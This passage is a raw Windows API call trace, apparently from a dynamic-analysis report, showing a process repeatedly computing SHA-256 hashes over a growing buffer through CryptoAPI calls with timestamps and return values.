CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64070, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64070, pdwDataLen=0xce51c) returned 1 [0151.145] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.145] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.145] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.146] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.146] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0151.146] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.146] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64640 [0151.146] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64640, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64640, pdwDataLen=0xce51c) returned 1 [0151.146] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.146] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.146] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.146] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.146] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x500, dwFlags=0x0) returned 1 [0151.146] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.146] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63fe0 [0151.146] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63fe0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63fe0, pdwDataLen=0xce51c) returned 1 [0151.146] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.146] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.147] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.147] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.147] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x520, dwFlags=0x0) returned 1 [0151.147] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.147] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63f50 [0151.147] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63f50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63f50, pdwDataLen=0xce51c) returned 1 [0151.147] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.147] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.147] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.148] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.148] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x540, dwFlags=0x0) returned 1 [0151.148] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.148] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63b00 [0151.148] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63b00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63b00, pdwDataLen=0xce51c) returned 1 [0151.148] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.148] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.148] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.149] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.149] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x560, dwFlags=0x0) returned 1 [0151.149] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.149] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e642e0 [0151.149] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e642e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e642e0, pdwDataLen=0xce51c) returned 1 [0151.149] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.149] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.149] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.149] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.149] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x580, dwFlags=0x0) returned 1 [0151.149] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.149] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e641f0 [0151.149] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e641f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e641f0, pdwDataLen=0xce51c) returned 1 [0151.149] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.149] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.149] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.150] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.150] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0151.150] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.150] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64310 [0151.150] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64310, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64310, pdwDataLen=0xce51c) returned 1 [0151.150] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.150] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.150] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.151] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.151] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0151.151] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.151] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63bc0 [0151.151] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e63bc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63bc0, pdwDataLen=0xce51c) returned 1 [0151.151] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.151] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.151] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.151] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.151] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0151.152] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.152] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e641c0 [0151.152] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e641c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e641c0, pdwDataLen=0xce51c) returned 1 [0151.152] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.152] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.152] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.152] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.152] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x600, dwFlags=0x0) returned 1 [0151.152] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.152] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64160 [0151.152] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64160, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64160, pdwDataLen=0xce51c) returned 1 [0151.152] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.152] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.152] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.153] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.153] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x620, dwFlags=0x0) returned 1 [0151.153] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.153] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63da0 [0151.153] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63da0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63da0, pdwDataLen=0xce51c) returned 1 [0151.153] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.153] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.153] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.154] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.154] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x640, dwFlags=0x0) returned 1 [0151.154] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64490 [0151.154] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e64490, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64490, pdwDataLen=0xce51c) returned 1 [0151.154] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.154] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.154] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.154] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.154] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x660, dwFlags=0x0) returned 1 [0151.154] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63b90 [0151.154] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e63b90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63b90, pdwDataLen=0xce51c) returned 1 [0151.154] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.154] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.154] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.155] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.155] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x680, dwFlags=0x0) returned 1 [0151.155] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64190 [0151.155] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64190, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64190, pdwDataLen=0xce51c) returned 1 [0151.155] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.155] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.155] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.156] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.156] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0151.156] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64010 [0151.156] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64010, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64010, pdwDataLen=0xce51c) returned 1 [0151.156] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.156] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.156] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.156] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.156] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0151.156] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63f20 [0151.156] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63f20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63f20, pdwDataLen=0xce51c) returned 1 [0151.156] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.157] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.157] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.157] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.157] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0151.157] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.157] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64580 [0151.157] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64580, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64580, pdwDataLen=0xce51c) returned 1 [0151.157] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.157] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.157] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.158] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.158] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x700, dwFlags=0x0) returned 1 [0151.158] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.158] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64670 [0151.158] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e64670, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64670, pdwDataLen=0xce51c) returned 1 [0151.158] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.158] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.158] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.158] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.158] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x720, dwFlags=0x0) returned 1 [0151.158] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.158] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e640a0 [0151.158] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e640a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e640a0, pdwDataLen=0xce51c) returned 1 [0151.158] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.159] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.159] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.159] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.159] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x740, dwFlags=0x0) returned 1 [0151.159] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.159] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63f80 [0151.159] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e63f80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63f80, pdwDataLen=0xce51c) returned 1 [0151.159] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.159] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.159] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.160] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.160] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x760, dwFlags=0x0) returned 1 [0151.160] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.160] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e646a0 [0151.160] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e646a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e646a0, pdwDataLen=0xce51c) returned 1 [0151.160] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.160] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.160] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.160] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.160] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x780, dwFlags=0x0) returned 1 [0151.161] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64220 [0151.161] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64220, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64220, pdwDataLen=0xce51c) returned 1 [0151.161] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.161] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.161] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.161] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.161] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0151.161] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63fb0 [0151.161] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63fb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63fb0, pdwDataLen=0xce51c) returned 1 [0151.161] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.161] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.161] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.162] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.162] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0151.162] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.162] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64100 [0151.162] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64100, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64100, pdwDataLen=0xce51c) returned 1 [0151.162] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.162] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.162] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0151.163] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.163] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0151.163] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.163] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e645e0 [0151.163] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e645e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e645e0, pdwDataLen=0xce51c) returned 1 [0151.163] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.163] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0151.163] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.179] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.179] CryptHashData 